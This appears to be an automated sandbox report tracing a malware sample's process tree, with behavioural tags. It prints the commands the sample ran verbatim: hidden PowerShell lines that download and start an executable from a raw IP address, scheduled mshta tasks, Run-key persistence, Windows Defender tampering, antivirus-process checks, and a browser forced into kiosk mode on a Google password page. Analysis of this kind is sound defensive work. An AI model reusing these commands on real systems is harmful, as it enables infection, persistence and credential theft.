pid Process 2144 2025-03-26_931cf964ce6a57469dbb4b1348d731da_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 2144 2025-03-26_931cf964ce6a57469dbb4b1348d731da_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 2144 2025-03-26_931cf964ce6a57469dbb4b1348d731da_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 2816 c282bd3fc1.exe 2816 c282bd3fc1.exe 2816 c282bd3fc1.exe 2204 e77f7e910d.exe 2204 e77f7e910d.exe 2204 e77f7e910d.exe 2204 e77f7e910d.exe 2204 e77f7e910d.exe 2796 firefox.exe 2796 firefox.exe 2796 firefox.exe 2204 e77f7e910d.exe 2204 e77f7e910d.exe 2204 e77f7e910d.exe 2204 e77f7e910d.exe 2204 e77f7e910d.exe 3616 Exam.com 3616 Exam.com 3616 Exam.com 3588 Exam.com 3588 Exam.com 3588 Exam.com -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2144 wrote to memory of 2108 2144 2025-03-26_931cf964ce6a57469dbb4b1348d731da_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 29 PID 2144 wrote to memory of 2108 2144 2025-03-26_931cf964ce6a57469dbb4b1348d731da_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 29 PID 2144 wrote to memory of 2108 2144 2025-03-26_931cf964ce6a57469dbb4b1348d731da_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 29 PID 2144 wrote to memory of 2108 2144 2025-03-26_931cf964ce6a57469dbb4b1348d731da_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 29 PID 2144 wrote to memory of 2584 2144 2025-03-26_931cf964ce6a57469dbb4b1348d731da_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 30 PID 2144 wrote to memory of 2584 2144 2025-03-26_931cf964ce6a57469dbb4b1348d731da_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 30 PID 2144 wrote to memory of 2584 2144 2025-03-26_931cf964ce6a57469dbb4b1348d731da_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 30 PID 2144 wrote to memory of 2584 2144 2025-03-26_931cf964ce6a57469dbb4b1348d731da_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 30 PID 2108 wrote to memory of 544 2108 cmd.exe 32 PID 2108 wrote to memory of 544 2108 cmd.exe 32 PID 2108 wrote to memory of 544 2108 cmd.exe 32 PID 2108 wrote to memory of 544 2108 cmd.exe 32 PID 2584 wrote to memory of 2888 2584 mshta.exe 33 PID 2584 wrote to memory of 2888 2584 mshta.exe 33 PID 2584 wrote to memory of 2888 2584 mshta.exe 33 PID 2584 wrote to memory of 2888 2584 mshta.exe 33 PID 2888 wrote to memory of 2796 2888 powershell.exe 35 PID 2888 wrote to memory of 2796 2888 powershell.exe 35 PID 2888 wrote to memory of 2796 2888 powershell.exe 35 PID 2888 wrote to memory of 2796 2888 powershell.exe 35 PID 2796 wrote to memory of 2756 2796 TempTA7A6OWBDSRKQ6JN7V63MEKKWFLUFQS3.EXE 36 PID 2796 wrote to memory of 2756 2796 TempTA7A6OWBDSRKQ6JN7V63MEKKWFLUFQS3.EXE 36 PID 2796 wrote to memory of 2756 2796 TempTA7A6OWBDSRKQ6JN7V63MEKKWFLUFQS3.EXE 36 PID 2796 wrote to memory of 2756 2796 TempTA7A6OWBDSRKQ6JN7V63MEKKWFLUFQS3.EXE 36 PID 2756 wrote to memory of 3000 2756 rapes.exe 38 PID 2756 wrote to memory of 3000 2756 rapes.exe 38 PID 2756 wrote to memory of 3000 2756 rapes.exe 38 PID 2756 wrote to memory of 3000 2756 rapes.exe 38 PID 3000 wrote to memory of 2368 3000 dBSGwVB.exe 39 PID 3000 wrote to memory of 2368 3000 dBSGwVB.exe 39 PID 3000 wrote to memory of 2368 3000 dBSGwVB.exe 39 PID 3000 wrote to memory of 2368 3000 dBSGwVB.exe 39 PID 2368 wrote to memory of 616 2368 cmd.exe 41 PID 2368 wrote to memory of 616 2368 cmd.exe 41 PID 2368 wrote to memory of 616 2368 cmd.exe 41 PID 2368 wrote to memory of 616 2368 cmd.exe 41 PID 2368 wrote to memory of 1808 2368 cmd.exe 42 PID 2368 wrote to memory of 1808 2368 cmd.exe 42 PID 2368 wrote to memory of 1808 2368 cmd.exe 42 PID 2368 wrote to memory of 1808 2368 cmd.exe 42 PID 2756 wrote to memory of 2504 2756 rapes.exe 45 PID 2756 wrote to memory of 2504 2756 rapes.exe 45 PID 2756 wrote to memory of 2504 2756 rapes.exe 45 PID 2756 wrote to memory of 2504 2756 rapes.exe 45 PID 2504 wrote to memory of 2204 2504 kDveTWY.exe 47 PID 2504 wrote to memory of 2204 2504 kDveTWY.exe 47 PID 2504 wrote to memory of 2204 2504 kDveTWY.exe 47 PID 2756 wrote to memory of 2816 2756 rapes.exe 48 PID 2756 wrote to memory of 2816 2756 rapes.exe 48 PID 2756 wrote to memory of 2816 2756 rapes.exe 48 PID 2756 wrote to memory of 2816 2756 rapes.exe 48 PID 2816 wrote to memory of 2768 2816 c282bd3fc1.exe 49 PID 2816 wrote to memory of 2768 2816 c282bd3fc1.exe 49 PID 2816 wrote to memory of 2768 2816 c282bd3fc1.exe 49 PID 2816 wrote to memory of 2768 2816 c282bd3fc1.exe 49 PID 2816 wrote to memory of 2800 2816 c282bd3fc1.exe 50 PID 2816 wrote to memory of 2800 2816 c282bd3fc1.exe 50 PID 2816 wrote to memory of 2800 2816 c282bd3fc1.exe 50 PID 2816 wrote to memory of 2800 2816 c282bd3fc1.exe 50 PID 2800 wrote to memory of 2728 2800 mshta.exe 52 PID 2800 wrote to memory of 2728 2800 mshta.exe 52 PID 2800 wrote to memory of 2728 2800 mshta.exe 52 PID 2800 wrote to memory of 2728 2800 mshta.exe 52 PID 2768 wrote to memory of 2676 2768 cmd.exe 54 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\2025-03-26_931cf964ce6a57469dbb4b1348d731da_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe"C:\Users\Admin\AppData\Local\Temp\2025-03-26_931cf964ce6a57469dbb4b1348d731da_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe"1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:2144 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c schtasks /create /tn 4n3jRmagOBa /tr "mshta C:\Users\Admin\AppData\Local\Temp\EBVQYeXpe.hta" /sc minute /mo 25 /ru "Admin" /f2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2108 -
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn 4n3jRmagOBa /tr "mshta C:\Users\Admin\AppData\Local\Temp\EBVQYeXpe.hta" /sc minute /mo 25 /ru "Admin" /f3⤵
- Scheduled Task/Job: Scheduled Task
PID:544
-
-
-
C:\Windows\SysWOW64\mshta.exemshta C:\Users\Admin\AppData\Local\Temp\EBVQYeXpe.hta2⤵
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:2584 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'TA7A6OWBDSRKQ6JN7V63MEKKWFLUFQS3.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Downloads MZ/PE file
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2888 -
C:\Users\Admin\AppData\Local\TempTA7A6OWBDSRKQ6JN7V63MEKKWFLUFQS3.EXE"C:\Users\Admin\AppData\Local\TempTA7A6OWBDSRKQ6JN7V63MEKKWFLUFQS3.EXE"4⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Loads dropped DLL
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:2796 -
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"5⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Downloads MZ/PE file
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Loads dropped DLL
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2756 -
C:\Users\Admin\AppData\Local\Temp\10341760101\dBSGwVB.exe"C:\Users\Admin\AppData\Local\Temp\10341760101\dBSGwVB.exe"6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3000 -
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Public\Netstat\netsup.bat" "7⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2368 -
C:\Windows\SysWOW64\reg.exeREG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Netstat" /t REG_SZ /F /D "C:\Users\Public\Netstat\bild.exe"8⤵
- Adds Run key to start application
- System Location Discovery: System Language Discovery
PID:616
-
-
C:\Users\Public\Netstat\bild.exeC:\Users\Public\Netstat\bild.exe8⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:1808
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10342330101\kDveTWY.exe"C:\Users\Admin\AppData\Local\Temp\10342330101\kDveTWY.exe"6⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2504 -
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 2504 -s 367⤵
- Loads dropped DLL
PID:2204
-
-
-
C:\Users\Admin\AppData\Local\Temp\10342650101\c282bd3fc1.exe"C:\Users\Admin\AppData\Local\Temp\10342650101\c282bd3fc1.exe"6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:2816 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c schtasks /create /tn Jx6nqmajg0F /tr "mshta C:\Users\Admin\AppData\Local\Temp\P5wCSfy3P.hta" /sc minute /mo 25 /ru "Admin" /f7⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2768 -
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn Jx6nqmajg0F /tr "mshta C:\Users\Admin\AppData\Local\Temp\P5wCSfy3P.hta" /sc minute /mo 25 /ru "Admin" /f8⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:2676
-
-
-
C:\Windows\SysWOW64\mshta.exemshta C:\Users\Admin\AppData\Local\Temp\P5wCSfy3P.hta7⤵
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:2800 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'KRJKXBINCLOTO4DE8F4SCNUOXVYYU2A2.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;8⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Downloads MZ/PE file
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2728 -
C:\Users\Admin\AppData\Local\TempKRJKXBINCLOTO4DE8F4SCNUOXVYYU2A2.EXE"C:\Users\Admin\AppData\Local\TempKRJKXBINCLOTO4DE8F4SCNUOXVYYU2A2.EXE"9⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:2156
-
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\10342660121\am_no.cmd" "6⤵
- System Location Discovery: System Language Discovery
PID:2988 -
C:\Windows\SysWOW64\timeout.exetimeout /t 27⤵
- System Location Discovery: System Language Discovery
- Delays execution with timeout.exe
PID:2600
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"7⤵
- System Location Discovery: System Language Discovery
PID:2192 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"8⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2216
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"7⤵
- System Location Discovery: System Language Discovery
PID:3036 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"8⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3008
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"7⤵PID:1444
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"8⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1452
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn "aSNEUmadviG" /tr "mshta \"C:\Temp\vDaERfmyt.hta\"" /sc minute /mo 25 /ru "Admin" /f7⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:1484
-
-
C:\Windows\SysWOW64\mshta.exemshta "C:\Temp\vDaERfmyt.hta"7⤵
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
PID:2164 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;8⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Downloads MZ/PE file
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1316 -
C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"9⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:2264
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10342880101\ruKazpr.exe"C:\Users\Admin\AppData\Local\Temp\10342880101\ruKazpr.exe"6⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2296 -
C:\Users\Admin\AppData\Local\Temp\10342880101\ruKazpr.exe"C:\Users\Admin\AppData\Local\Temp\10342880101\ruKazpr.exe"7⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2468
-
-
-
C:\Users\Admin\AppData\Local\Temp\10343000101\9260698ccd.exe"C:\Users\Admin\AppData\Local\Temp\10343000101\9260698ccd.exe"6⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:2552
-
-
C:\Users\Admin\AppData\Local\Temp\10343010101\f98d469f2d.exe"C:\Users\Admin\AppData\Local\Temp\10343010101\f98d469f2d.exe"6⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:2332
-
-
C:\Users\Admin\AppData\Local\Temp\10343020101\e77f7e910d.exe"C:\Users\Admin\AppData\Local\Temp\10343020101\e77f7e910d.exe"6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:2204 -
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM firefox.exe /T7⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2264
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM chrome.exe /T7⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1736
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM msedge.exe /T7⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2716
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM opera.exe /T7⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2928
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM brave.exe /T7⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2852
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking7⤵PID:2460
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking8⤵
- Checks processor information in registry
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:2796 -
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2796.0.1630665936\1713158649" -parentBuildID 20221007134813 -prefsHandle 1224 -prefMapHandle 1216 -prefsLen 20847 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {71566851-0948-4f7a-bd95-a6c29f106532} 2796 "\\.\pipe\gecko-crash-server-pipe.2796" 1288 111d5858 gpu9⤵PID:1904
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2796.1.721293968\1443667402" -parentBuildID 20221007134813 -prefsHandle 1488 -prefMapHandle 1484 -prefsLen 21708 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {8da7537b-a4e8-4a58-8807-45b48016869a} 2796 "\\.\pipe\gecko-crash-server-pipe.2796" 1500 d73358 socket9⤵PID:292
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2796.2.901166669\626223877" -childID 1 -isForBrowser -prefsHandle 1828 -prefMapHandle 1840 -prefsLen 21746 -prefMapSize 233444 -jsInitHandle 900 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {6786f644-293c-42ac-bff0-ac43dc2e4f09} 2796 "\\.\pipe\gecko-crash-server-pipe.2796" 1120 1a598b58 tab9⤵PID:2324
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2796.3.1838074134\288346603" -childID 2 -isForBrowser -prefsHandle 2900 -prefMapHandle 2896 -prefsLen 26216 -prefMapSize 233444 -jsInitHandle 900 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {45cd763f-abf1-4ccf-a48b-c865413df115} 2796 "\\.\pipe\gecko-crash-server-pipe.2796" 2912 d64b58 tab9⤵PID:936
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2796.4.1608080544\1150645458" -childID 3 -isForBrowser -prefsHandle 3816 -prefMapHandle 3824 -prefsLen 26275 -prefMapSize 233444 -jsInitHandle 900 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {4ddf8276-5cef-4520-90ee-716d6609f6cb} 2796 "\\.\pipe\gecko-crash-server-pipe.2796" 3832 20af7e58 tab9⤵PID:2772
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2796.5.387830133\1738139190" -childID 4 -isForBrowser -prefsHandle 3956 -prefMapHandle 3960 -prefsLen 26275 -prefMapSize 233444 -jsInitHandle 900 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {b6520831-7687-4e73-90df-97e69b5ba0a1} 2796 "\\.\pipe\gecko-crash-server-pipe.2796" 3944 20afa858 tab9⤵PID:2904
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2796.6.1870368497\1284693133" -childID 5 -isForBrowser -prefsHandle 4124 -prefMapHandle 4128 -prefsLen 26275 -prefMapSize 233444 -jsInitHandle 900 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {0972977d-1b7d-4687-954c-2f10d48fc603} 2796 "\\.\pipe\gecko-crash-server-pipe.2796" 4112 20af7858 tab9⤵PID:2860
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10343030101\2800dc5678.exe"C:\Users\Admin\AppData\Local\Temp\10343030101\2800dc5678.exe"6⤵
- Modifies Windows Defender DisableAntiSpyware settings
- Modifies Windows Defender Real-time Protection settings
- Modifies Windows Defender TamperProtection settings
- Modifies Windows Defender notification settings
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Windows security modification
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3048
-
-
C:\Users\Admin\AppData\Local\Temp\10343040101\b556799e91.exe"C:\Users\Admin\AppData\Local\Temp\10343040101\b556799e91.exe"6⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:3324
-
-
C:\Users\Admin\AppData\Local\Temp\10343050101\ea6e8dda70.exe"C:\Users\Admin\AppData\Local\Temp\10343050101\ea6e8dda70.exe"6⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Loads dropped DLL
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:3928 -
C:\Users\Admin\AppData\Local\Temp\svchost015.exe"C:\Users\Admin\AppData\Local\Temp\10343050101\ea6e8dda70.exe"7⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:3164
-
-
-
C:\Users\Admin\AppData\Local\Temp\10343060101\458f5962ca.exe"C:\Users\Admin\AppData\Local\Temp\10343060101\458f5962ca.exe"6⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Loads dropped DLL
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:3088 -
C:\Users\Admin\AppData\Local\Temp\svchost015.exe"C:\Users\Admin\AppData\Local\Temp\10343060101\458f5962ca.exe"7⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:1972
-
-
-
C:\Users\Admin\AppData\Local\Temp\10343070101\kDveTWY.exe"C:\Users\Admin\AppData\Local\Temp\10343070101\kDveTWY.exe"6⤵
- Executes dropped EXE
PID:3652 -
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 3652 -s 367⤵
- Loads dropped DLL
PID:3648
-
-
-
C:\Users\Admin\AppData\Local\Temp\10343080101\dBSGwVB.exe"C:\Users\Admin\AppData\Local\Temp\10343080101\dBSGwVB.exe"6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:3792 -
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Public\Netstat\netsup.bat" "7⤵PID:3812
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Netstat" /t REG_SZ /F /D "C:\Users\Public\Netstat\bild.exe"8⤵
- Adds Run key to start application
- System Location Discovery: System Language Discovery
PID:3824
-
-
C:\Users\Public\Netstat\bild.exeC:\Users\Public\Netstat\bild.exe8⤵
- Executes dropped EXE
- Loads dropped DLL
PID:3820
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Public\Netstat\netsup.bat" "7⤵
- System Location Discovery: System Language Discovery
PID:3856 -
C:\Windows\SysWOW64\reg.exeREG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Netstat" /t REG_SZ /F /D "C:\Users\Public\Netstat\bild.exe"8⤵
- Adds Run key to start application
- System Location Discovery: System Language Discovery
PID:3892
-
-
C:\Users\Public\Netstat\bild.exeC:\Users\Public\Netstat\bild.exe8⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:3908
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10343090101\WLbfHbp.exe"C:\Users\Admin\AppData\Local\Temp\10343090101\WLbfHbp.exe"6⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
PID:3504 -
C:\Windows\SysWOW64\CMD.exe"C:\Windows\system32\CMD.exe" /c copy Edit.vss Edit.vss.bat & Edit.vss.bat7⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:4032 -
C:\Windows\SysWOW64\tasklist.exetasklist8⤵
- Enumerates processes with tasklist
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:4060
-
-
C:\Windows\SysWOW64\findstr.exefindstr /I "opssvc wrsa"8⤵
- System Location Discovery: System Language Discovery
PID:2236
-
-
C:\Windows\SysWOW64\tasklist.exetasklist8⤵
- Enumerates processes with tasklist
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:3224
-
-
C:\Windows\SysWOW64\findstr.exefindstr "SophosHealth bdservicehost AvastUI AVGUI nsWscSvc ekrn"8⤵
- System Location Discovery: System Language Discovery
PID:2204
-
-
C:\Windows\SysWOW64\cmd.execmd /c md 2679788⤵
- System Location Discovery: System Language Discovery
PID:1752
-
-
C:\Windows\SysWOW64\extrac32.exeextrac32 /Y /E Spanish.vss8⤵PID:3248
-
-
C:\Windows\SysWOW64\findstr.exefindstr /V "East" Removed8⤵
- System Location Discovery: System Language Discovery
PID:2644
-
-
C:\Windows\SysWOW64\cmd.execmd /c copy /b 267978\Exam.com + Vermont + Conflict + Remarks + Safer + Districts + Eddie + Awful + Garage + Sexually + Mitsubishi + Freeware 267978\Exam.com8⤵
- System Location Discovery: System Language Discovery
PID:3516
-
-
C:\Windows\SysWOW64\cmd.execmd /c copy /b ..\Austin.vss + ..\Canal.vss + ..\Cottage.vss + ..\Engineers.vss + ..\Racks.vss + ..\Spy.vss + ..\Weekends.vss + ..\Shirt.vss + ..\Fields.vss + ..\Flyer.vss + ..\Strengthening.vss + ..\Floors.vss j8⤵PID:3628
-
-
C:\Users\Admin\AppData\Local\Temp\267978\Exam.comExam.com j8⤵
- Executes dropped EXE
